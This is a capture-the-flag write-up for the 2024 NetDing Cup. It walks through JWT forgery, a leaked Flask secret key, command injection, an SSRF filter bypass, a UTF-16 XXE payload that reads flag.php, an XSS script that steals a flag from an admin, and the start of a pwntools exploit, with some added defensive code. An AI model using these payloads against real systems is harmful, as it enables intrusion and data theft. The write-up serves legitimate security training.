Title: 2024 4th NetDing Cup Partial Competition Group WP

1. Qinglong Group WEB

web1

You can log in right at the start. After logging in, two things are issued: a token, which is a JWT, and a session, which is the Flask framework's session cookie.

This is the original challenge it is based on; forge the JWT first.

CTFtime.org/DownUnderCTF 2021 (Online)/JWT/Writeup

Create two tokens, then use the rsa_sign2n tool to recover the public key from them:

python3 jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYWFhIn0.EnToBP4kzW6jbUqkC7fjt-FcCq9mOMhKWRqKpo12BsG464YTX2QNiBLuzgqJhnDlGF2Ukqb6oWXhFm0qiKrbg1skUb0FO2kMBkEvRLpyGJ7tXOzcndGDl-egaMa-mSN321RNW-aiCKJsij5Tf0HzQgBU8UCg1Zd8uJaybcj3oXOi eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEifQ.IUanU3g_ZtyPjDnOJ9gockfRo1oOQLmQT0To_WYLi9I9PluHxbBId5d2wFiF-sIhGPuDtzPvShiE1ao0qnMlp3X7pVf-Qb-juaslvbnpR1rCKH2D3Kq4u1d2wEDvsgWVtjYA6s5NXrvJpzDcpZlzmx_6Ywn8caqVQ3kjlTv87OKO

This yields the public key:

-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgSSlUMfCzg/ysG4ixoi6NKGuWNnv
IpZZTRNa045eH2xzzY/ZyRwDojStMH5wxG6nOVvNAY/ETx2XPPC6J1J//nzC1fAN
MNCYRa47xIW0RwZBDSABcGnwu3QP2nr7AR0/tZmSClncdwA7RKzlJM8Fs7Zmb502
ZMSv0AxMgN5UMh9FCwIDAQAB
-----END PUBLIC KEY-----

Then use RsaCtfTool to recover the private key from it.


With the forged JWT you can reach the game route. This part is adapted from another foreign challenge:

AIS3-pre-exam-2024-Writeup | Naup's Blog

Use an emoji to construct the command cd flag;p:|cat *

Reading the source code directly gives the secret_key: 36f8efbea152e50b23290e0ed707b4b0

Then just forge the session with it.


With an admin session the file upload function becomes usable. Let's first audit the source code of that part.

# Imports the excerpt needs (added for readability); app, decode_jwt,
# UploadForm and GameForm are defined elsewhere in the challenge source.
import requests
from flask import flash, redirect, render_template, request, session, url_for
from werkzeug.utils import secure_filename


@app.route('/upload', methods=['GET', 'POST'])
def upload():
    token = request.cookies.get('token')
    if not token:
        flash('Please login first', 'warning')
        return redirect(url_for('login'))
    payload = decode_jwt(token)
    form = UploadForm()
    # First gate: the JWT must say username == 'admin'
    if not payload or payload['username'] != 'admin':
        error_message = 'You do not have permission to access this page.Your username is not admin.'
        return render_template('upload.html', form=form, error_message=error_message, username=payload['username'])
    # Second gate: the Flask session must say role == 'admin' (forgeable with the leaked secret_key)
    if not session['role'] or session['role'] != 'admin':
        error_message = 'You do not have permission to access this page.Your role is not admin.'
        return render_template('upload.html', form=form, error_message=error_message, username=payload['username'])
    if form.validate_on_submit():
        file = form.avatar.data
        if file:
            filename = secure_filename(file.filename)
            files = {'file': (filename, file.stream, file.content_type)}
            # The upload is forwarded to the internal PHP service on port 80
            php_service_url = 'http://127.0.0.1/upload.php'
            response = requests.post(php_service_url, files=files)
            if response.status_code == 200:
                flash(response.text, 'success')
            else:
                flash('Failed to upload file to PHP service', 'danger')
    return render_template('upload.html', form=form)


@app.route('/view_uploads', methods=['GET', 'POST'])
def view_uploads():
    token = request.cookies.get('token')
    form = GameForm()
    if not token:
        error_message = 'Please login first'
        return render_template('view_uploads.html', form=form, error_message=error_message)
    payload = decode_jwt(token)
    if not payload:
        error_message = 'Invalid or expired token. Please login again.'
        return render_template('view_uploads.html', form=form, error_message=error_message)
    if not payload['username'] == 'admin':
        error_message = 'You do not have permission to access this page.Your username is not admin'
        return render_template('view_uploads.html', form=form, error_message=error_message)
    user_input = None
    if form.validate_on_submit():
        filepath = form.user_input.data
        pathurl = request.form.get('path')
        # The "WAF": substring checks on the user-supplied URL and file path
        if ('www.testctf.com' not in pathurl) or ('127.0.0.1' in pathurl) or ('/var/www/html/uploads/' not in filepath) or ('.' in filepath):
            error_message = 'www.testctf.com must in path and /var/www/html/uploads/must in filepath.'
            return render_template('view_uploads.html', form=form, error_message=error_message)
        params = {'s': filepath}
        try:
            # Server-side request to whatever host passed the check above
            response = requests.get('http://' + pathurl, params=params, timeout=1)
            return render_template('view_uploads.html', form=form, user_input=response.text)
        except:
            error_message = '500! Server Error'
            return render_template('view_uploads.html', form=form, error_message=error_message)
    return render_template('view_uploads.html', form=form, user_input=user_input)

There is a PHP service on port 80. The /upload route uploads files into the uploads directory, and you can view them through the /view_uploads route, but there is a WAF:

if ('www.testctf.com' not in pathurl) or ('127.0.0.1' in pathurl) or ('/var/www/html/uploads/' not in filepath) or ('.' in filepath):

The domain name www.testctf.com must appear in the path and 127.0.0.1 must not. 0.0.0.0 can be used in place of 127.0.0.1, and the www.testctf.com@0.0.0.0 form of the URL (the jump in the SSRF) gets around the domain-name restriction:
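The check decides on substrings of the string rather than on the host the request will actually reach. As an added example (not code from the writeup or the challenge), here is that condition next to a check that parses the URL and normalises the path; the allowlist and the function names are assumptions:

```python
# Added example (not code from the writeup or the challenge): the substring
# condition from view_uploads beside a host-based check that parses the URL.
import ipaddress
import posixpath
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"www.testctf.com"}   # assumed allowlist for this example
UPLOAD_DIR = "/var/www/html/uploads/"

def weak_check(pathurl: str, filepath: str) -> bool:
    """The challenge's condition, inverted so True means 'request allowed'."""
    return not (("www.testctf.com" not in pathurl) or ("127.0.0.1" in pathurl)
                or (UPLOAD_DIR not in filepath) or ("." in filepath))

def strict_check(pathurl: str, filepath: str) -> bool:
    """Decide on the parsed host and the normalised path, not on substrings."""
    parts = urlsplit("http://" + pathurl)
    # 'allowed.host@evil' puts the allowed name in the userinfo, not the host.
    if parts.username is not None or parts.password is not None:
        return False
    try:
        port = parts.port          # raises ValueError on a malformed port
    except ValueError:
        return False
    host = parts.hostname
    if host is None or host not in ALLOWED_HOSTS or port not in (None, 80):
        return False
    # Defence in depth: a literal loopback/unspecified/private address is never
    # a valid target, even if it somehow ended up in the allowlist.
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None                  # a hostname, not a literal address
    if ip is not None and (ip.is_loopback or ip.is_unspecified
                           or ip.is_private or ip.is_link_local):
        return False
    # Normalise the path first, so '..' cannot escape the uploads directory.
    return posixpath.normpath(filepath).startswith(UPLOAD_DIR)
```

In the real handler the request would also be made with allow_redirects=False, since requests follows redirects by default and the allowlisted host could itself point back at 127.0.0.1.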

POST /view_uploads HTTP/1.1
Host: 0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 211
Origin: http://0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732
Connection: close
Referer: http://0192d68dfb217833b65d0adeec06784b.zeuo.dg01.ciihw.cn:45732/view_uploads
Cookie: session=eyJjc3JmX3Rva2VuIjoiYmQyNTJlZDZlYTQ5ZmJmOWQyZjJjMmQ0YTBlNjc1YzJhYzlmNmU5MyIsInJvbGUiOiJhZG1pbiJ9.ZyBmXg.eLZ3Z69hYgP6lG3vjiMNsKTLCno; token=eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.DNqIFNdFOWgGGnuk95SQa5GdU_D6TDv95lTU97wUP8ekgqX6zrnvvsnp8XkvVfSx0g3xVQqbo5xhdxjNpM8LiiwX_kQ8FO8t0q0qBn1RJ5O2bGkGOZsUWAUrKg7ME6L4-XFiXi7P328f1t4En_kSp91SeS7-9Lcn7Ja__IJbRuH1
Upgrade-Insecure-Requests: 1
Priority: u=0, i

csrf_token=ImJkMjUyZWQ2ZWE0OWZiZjlkMmYyYzJkNGEwZTY3NWMyYWM5ZjZlOTMi.ZyBmag.RCasLc0XUU8ep682nDtSZ5PeqsQ&path=www.testctf.com@0.0.0.0&user_input=/var/www/html/uploads/60edfb32093e262bfccda5496e1cdaa8&submit=Submit

So upload a file first and then read it back this way. Reading it reports "Failed to load XML File", which suggests the uploaded file is parsed as XML, so go straight for XXE. Many keywords such as SYSTEM are filtered, so encode the payload as UTF-16 to bypass the filter and read flag.php directly:

<?xml version='1.0' ?>
<!DOCTYPE replace [<!ENTITY example SYSTEM 'php://filter/convert.base64-encode/resource=/var/www/html/flag.php'>]>
<userInfo>
<firstName>John</firstName>
<lastName>&example;</lastName>
</userInfo>

Convert it to UTF-16:

iconv -f utf8 -t utf16 1.xml > 3.xml

Then upload 3.xml and read it back to get the flag.
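The UTF-16 trick works because the filter looks for keywords in the raw bytes while the parser decodes those bytes before it reads the DTD. As an added example (not from the writeup), here is such a byte-level filter beside a parser-level rejection of entity declarations using the standard library's expat bindings; the sample documents and the placeholder resource path are constructed:

```python
# Added example (not from the writeup): a raw-byte keyword filter beside a
# parser-level rejection of entity declarations, tried on a UTF-16 document.
from xml.parsers import expat

# Constructed sample in the writeup's shape; the resource path is a placeholder.
XXE_DOC = (
    "<?xml version='1.0' ?>\n"
    "<!DOCTYPE replace [<!ENTITY example SYSTEM 'file:///placeholder/secret'>]>\n"
    "<userInfo><firstName>John</firstName><lastName>&example;</lastName></userInfo>"
)
BENIGN_DOC = "<userInfo><firstName>John</firstName><lastName>Doe</lastName></userInfo>"
BLOCKED_KEYWORDS = (b"ENTITY", b"SYSTEM", b"PUBLIC")

class EntityDeclarationError(ValueError):
    pass

def keyword_filter_blocks(data: bytes) -> bool:
    """Naive WAF check on raw bytes: UTF-16 text never contains b"SYSTEM"."""
    upper = data.upper()
    return any(k in upper for k in BLOCKED_KEYWORDS)

def parse_untrusted_xml(data: bytes) -> dict:
    """Parse with expat and refuse every entity declaration, internal or external.
    expat decodes the bytes (BOM-detected UTF-16 included) before it reads the
    DTD, so re-encoding the payload cannot hide the declaration from this hook."""
    parser = expat.ParserCreate()
    fields, stack = {}, []

    def forbid_entity(name, is_param, value, base, system_id, public_id, notation):
        raise EntityDeclarationError(f"entity declaration {name!r} rejected")

    def collect_text(text):
        if stack:
            fields[stack[-1]] = fields.get(stack[-1], "") + text

    parser.EntityDeclHandler = forbid_entity
    parser.StartElementHandler = lambda name, attrs: stack.append(name)
    parser.EndElementHandler = lambda name: stack.pop()
    parser.CharacterDataHandler = collect_text
    parser.Parse(data, True)  # raises EntityDeclarationError on the XXE document
    return fields

def is_rejected(data: bytes) -> bool:
    """True when the parser refused the document because of an entity declaration."""
    try:
        parse_untrusted_xml(data)
    except EntityDeclarationError:
        return True
    return False
```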


web2

Opening the container shows a login page; enter any username and password to reach the vulnerable page.

There is a function for sending content to the boss, which is obviously XSS.

/flag has to be accessed by the boss. So we submit an XSS payload that makes the boss fetch /flag first and then post the response back into our content:

<script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.withCredentials = true;
xmlhttp.onreadystatechange = function() {
    if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
        var flagData = xmlhttp.responseText;
        var flag1 = btoa(flagData);
        var remoteServerUrl = '/content/4a95828e3f0037bfe446ae0e693912df';
        var xmlhttp2 = new XMLHttpRequest();
        xmlhttp2.open('POST', remoteServerUrl, true);
        xmlhttp2.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        xmlhttp2.send('content=' + encodeURIComponent(flag1));
    }
};
xmlhttp.open('GET', '/flag', true);
xmlhttp.send();
</script>

After updating the task, send it to the boss


Then go back to the page and see that the flag has been sent


PWN

PWN2


It starts with a login function; you get in once you have the username and password.


The vuln function has a two-byte overflow, and the address of buf is leaked.


It also gives us a backdoor function and a /bin/sh string.


Complete exploit:

from pwn import *

elf = ELF('./short')
context(arch=elf.arch, os=elf.os)
context.log_level = 'debug'
# libc = ELF('./libc.so.6')
flag = 0
url = '0192d6093a297e5e9de02a5fc5bb4757.tdfi.dg01.ciihw.cn'
po
